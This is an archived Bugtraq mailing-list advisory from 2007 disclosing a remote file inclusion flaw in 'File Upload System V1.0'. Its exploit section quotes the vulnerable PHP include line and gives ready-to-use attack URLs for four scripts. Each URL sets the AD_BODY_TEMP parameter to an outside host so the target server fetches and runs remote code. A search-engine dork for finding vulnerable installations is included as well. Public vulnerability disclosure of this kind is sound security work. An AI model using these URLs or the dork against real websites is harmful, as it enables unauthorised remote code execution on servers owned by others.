| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | File Upload System V1.0 (AD_BODY_TEMP) multiple file include |
| From: | ngevedBangetAsli@mbuhyesah.org |
| Date: | 24 Mar 2007 15:07:17 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina & jipank #----------------------------------------------------------- # Software: File Upload System V1.0 # Script Demo: http://demo.free-php-scripts.net/File_Upload # Method: file inclusion # Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew [[Exploitz]]--------------------------------------------------------- ?php include($AD_BODY_TEMP);?> exploit : http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu gugel dork : intext:"Marsal Design Co." |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabi, Cold - Zero |
|---|---|
| Next by Date: | FLEA-2007-0002-1: inkscape, Foresight Linux Essential Announcement Service |
| Previous by Thread: | Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabi, Cold - Zero |
| Next by Thread: | Remote File Include In phpBB-2.0.19, RaeD Hasadya |
| Indexes: | [Date] [Thread] [Top] [All Lists] |